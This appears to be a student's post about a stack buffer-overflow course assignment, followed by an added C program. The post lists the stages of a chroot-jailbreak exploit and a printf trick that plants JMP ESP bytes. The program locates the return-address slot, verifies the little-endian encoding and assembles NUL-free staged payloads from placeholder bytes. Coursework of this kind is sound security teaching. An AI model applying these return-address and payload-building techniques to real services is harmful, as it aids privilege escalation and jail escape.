I've spent a few hours trying to find the magic address value for i[129].
After emailing with Jed, I've looked at the dump file and tried to relate it to the server2.c file. I'm just not too sure how to read this dump file. I'm looking for an address where the size value would be pushed onto the stack.
I'm done guessing. I've tried just about every address that I could possibly think would be a location for the stringLength variable being passed into the Capitalize function as the last parameter. I believe once I find the location of the stack for this function call, I would then need to add 8*511 to that address to represent the offset location of the last char position in the array of data?
I'll take my 0.
This is foo-bar'ed... I haven't even started to look at the new test... ugh.
Here is what I have:
the root jail break order-
strcat(myexploit, nopsled);
strcat(myexploit, mkdir);
strcat(myexploit, chroota);
strcat(myexploit, setuidzero);
strcat(myexploit, chdirloop);
strcat(myexploit, chrootdotdot);
strcat(myexploit, doexecve);
the i[129] value:
i[129] = 0x080487d0; // note: I've tried many values from the dump file
the magic number for the printf:
// should land as JMP ESP, opcode bytes 0xff 0xe4
printf("58623\n"); // 58623 = 0xe4ff; stored little-endian the bytes in memory are ff e4
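Three checks that are worth running before spending more hours guessing, as an added example; this is not the assignment's server2.c and not the post's exploit. The first probe asks the compiler where the saved return address actually sits relative to a local int array (the slot the post calls i[129]; note that index 129 of an int array is 129*sizeof(int) = 516 bytes in, not 8*129, and a char is one byte). It relies on the classic frame layout (saved frame pointer at the frame address, return address one pointer above) and on the gcc/clang builtins, so it is a host-side sanity check, not a substitute for reading the target's dump. The second shows why 58623 works: 0xe4ff stored little-endian is ff e4 in memory. The third builds a payload the way the post does, by concatenating stages, but refuses any stage with an embedded NUL, which strcat would silently truncate. NSLOTS and the stage bytes are assumptions made up for the demo.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define NSLOTS 130   /* assumed array size; the post only says index 129 is the slot that matters */

/* 1. Index of the local int array that overlaps this frame's saved return address.
 *    Returns -1 if the frame does not look like "saved fp, then return address". */
__attribute__((noinline))
static long ret_slot_index(void)
{
    volatile int i[NSLOTS];
    i[0] = 0; i[NSLOTS - 1] = 0;                        /* keep the array allocated */
    char *fp = (char *)__builtin_frame_address(0);
    char *ret_slot = fp + sizeof(void *);               /* return address sits just above saved fp */
    void *saved_ret;
    memcpy(&saved_ret, ret_slot, sizeof saved_ret);     /* read it without aliasing games */
    if (saved_ret != __builtin_return_address(0) || ret_slot < (char *)i)
        return -1;
    return (long)((ret_slot - (char *)i) / sizeof(int));
}

/* 2. Store a 16-bit value the way a little-endian CPU does: low byte first. */
static void put_le16(uint8_t out[2], uint16_t v)
{
    out[0] = (uint8_t)(v & 0xff);
    out[1] = (uint8_t)(v >> 8);
}

/* Does this decimal count, written as a 16-bit word, leave ff e4 (jmp esp) in memory? */
static int value_encodes_jmp_esp(unsigned value)
{
    uint8_t b[2];
    if (value > 0xffff) return 0;
    put_le16(b, (uint16_t)value);
    return b[0] == 0xff && b[1] == 0xe4;
}

/* 3. Concatenate stages into dst, as the post does with strcat, but refuse a stage
 *    that contains a NUL (strcat would stop there and shift every later stage) and
 *    never write past dst. Returns the payload length, or -1 on refusal. */
static long build_payload(uint8_t *dst, size_t cap,
                          const uint8_t *const stages[], const size_t lens[], size_t n)
{
    size_t total = 0;
    for (size_t s = 0; s < n; s++) {
        if (memchr(stages[s], 0, lens[s]) != NULL) return -1;   /* embedded NUL byte */
        if (total + lens[s] >= cap) return -1;                   /* keep room for terminator */
        memcpy(dst + total, stages[s], lens[s]);
        total += lens[s];
    }
    dst[total] = 0;
    return (long)total;
}

/* Constructed placeholder stages: NOPs and int3, not real shellcode. */
static const uint8_t nopsled[] = { 0x90, 0x90, 0x90, 0x90 };
static const uint8_t trap[]    = { 0xcc, 0xcc };
/* mov eax,0 encodes as b8 00 00 00 00: the classic NUL problem, which is why
 * shellcode uses xor eax,eax instead. */
static const uint8_t mov_eax_0[] = { 0xb8, 0x00, 0x00, 0x00, 0x00 };

static long payload_demo_ok(void)
{
    uint8_t buf[32];
    const uint8_t *const st[] = { nopsled, trap };
    const size_t ln[] = { sizeof nopsled, sizeof trap };
    return build_payload(buf, sizeof buf, st, ln, 2);
}

static long payload_demo_nul(void)
{
    uint8_t buf[32];
    const uint8_t *const st[] = { nopsled, mov_eax_0 };
    const size_t ln[] = { sizeof nopsled, sizeof mov_eax_0 };
    return build_payload(buf, sizeof buf, st, ln, 2);
}

int main(void)
{
    printf("return address overlaps int index %ld on this host/compiler\n", ret_slot_index());
    printf("58623 as jmp esp: %d\n", value_encodes_jmp_esp(58623));
    printf("payload without NULs: %ld bytes\n", payload_demo_ok());
    printf("payload with mov eax,0 stage: %ld (refused)\n", payload_demo_nul());
    return 0;
}
```

The index printed by the first probe is only meaningful for the binary it runs in: stack protector canaries, padding and the optimizer all move the array, which is exactly why the post's i[129] has to come from the target's own disassembly or a controlled crash, not from a guess. The third check would have caught the setuid(0)-style stages that are the usual source of embedded NULs.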